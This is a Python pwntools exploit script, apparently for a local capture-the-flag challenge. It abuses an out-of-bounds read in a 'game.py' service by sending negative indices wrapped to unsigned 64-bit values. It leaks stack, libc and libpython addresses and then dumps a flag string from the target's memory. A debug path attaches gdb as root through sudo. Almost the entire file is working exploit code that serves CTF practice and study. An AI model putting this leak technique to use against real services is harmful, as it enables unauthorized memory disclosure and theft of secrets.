from pwn import *
import psutil
import time
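io = remote("localhost", 9090)

if args.DEBUG:
    # Give the target a moment to come up, then attach gdb to the game.py
    # process in a separate terminal and block until the operator is ready.
    time.sleep(1)
    # Using process_iter(attrs=...) instead of calling p.cmdline() on every
    # process: psutil then swallows per-process AccessDenied/NoSuchProcess
    # (the field becomes None / the process is skipped) rather than raising
    # part-way through the scan when another user's process is hit.
    # NOTE: this keeps the original match, an argv element *equal* to
    # "game.py" — `python ./game.py` or an absolute path is not matched.
    candidates = [
        p.info["pid"]
        for p in psutil.process_iter(["pid", "cmdline"])
        if p.info["cmdline"] and "game.py" in p.info["cmdline"]
    ]
    if not candidates:
        raise RuntimeError("no running process with 'game.py' in its argv; start the target first")
    if len(candidates) > 1:
        # Ambiguous target; the original behaviour (first match) is kept but
        # made visible so a wrong attach is not silent.
        print(f"warning: several game.py processes {candidates}, attaching to the first")
    pid = candidates[0]
    # sudo: ptrace attach to a process we may not own; -E keeps the caller's
    # environment for the spawned terminal.  Local-CTF convenience only —
    # this runs gdb as root.
    util.misc.run_in_new_terminal(f"sudo -E gdb --pid={pid}")
    input()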
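def leak(offset, unpack=True):
    """Read 8 bytes from the remote, at a byte offset relative to its buffer.

    Plays one "hard" round.  For each of the eight bytes it answers the
    "Index 1" prompt with ``0`` and the "Index 2" prompt with
    ``offset + i``; a negative index is sent as its unsigned 64-bit
    two's-complement value, which is what lets the read reach memory below
    the buffer.  Each reply line is expected to be ``"<word> <byte>"`` and
    the second whitespace-separated field is parsed as the byte value.

    Args:
        offset: byte offset relative to the remote's buffer; may be negative.
        unpack: when True, return the 8 bytes as a little-endian unsigned
            64-bit int; otherwise return the raw ``bytes``.

    Returns:
        ``int`` or ``bytes`` depending on ``unpack``.

    Raises:
        ValueError: if a parsed value is not in 0..255 — usually a sign the
            remote did not answer with a byte read (e.g. index rejected).
    """
    io.readuntil(b"Easy or Hard? ")
    io.sendline(b"hard")
    io.readuntil(b"Ready? ")
    io.sendline(b"")
    out = bytearray()
    for i in range(8):
        io.readuntil(b"Index 1: ")
        io.sendline(b"0")
        io.readuntil(b"Index 2: ")
        # Wrap each index on its own.  The previous code wrapped `offset`
        # once and then added `i`, which produces a wrong index if
        # offset + i crosses zero (e.g. offset=-3, i=5).
        index = (offset + i) % (1 << 64)
        io.sendline(str(index).encode())
        line = io.readline()
        out.append(int(line.split(b" ")[1]))
    if unpack:
        return struct.unpack("<Q", bytes(out))[0]
    return bytes(out)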
# Earlier, now unused approach kept for reference (not executed): derive the
# flag address via libc / libpython offsets instead of the direct reads below.
# stack_leak = leak(-0x28)
# numbers = stack_leak - 0x100
# print("numbers", hex(numbers))
#
# libc_leak = leak(-0x18)
# libc_clock_gettime = 0x00000000000cd6a0
# libc_base = libc_leak - 29 - libc_clock_gettime
# print("libc", hex(libc_base))
#
# libpython_base = libc_base + 0x1e7000
# print("libpython", hex(libpython_base))
#
# pythonvars_leak = libpython_base + 0x390858
# vars_base = leak(pythonvars_leak - numbers)
# print("pythonvars", hex(vars_base))
#
# flag_var = vars_base + 0x7fd00
# print("flag", hex(flag_var))
#for i in range(10):
# print(leak(flag_var + i * 8 - numbers, False))
# Locate the flag with two out-of-bounds reads, then dump it 8 bytes at a time.
# `numbers` is the base that every later offset is taken relative to; the two
# negative offsets are stack-relative distances found for this target.
numbers = leak(-0x30)
print(numbers)
# Taken to be the address of the flag object; its characters are read from
# 0x30 bytes in (presumably the data offset of a compact str object on the
# target's CPython build — verify if the output looks wrong).
flagobj = leak(-0xb48)
print(flagobj)
flagstr = flagobj + 0x30
# Four raw 8-byte chunks (unpack=False) covering 0x20 bytes of the string.
for chunk in range(0, 0x20, 8):
    print(leak(flagstr + chunk - numbers, False))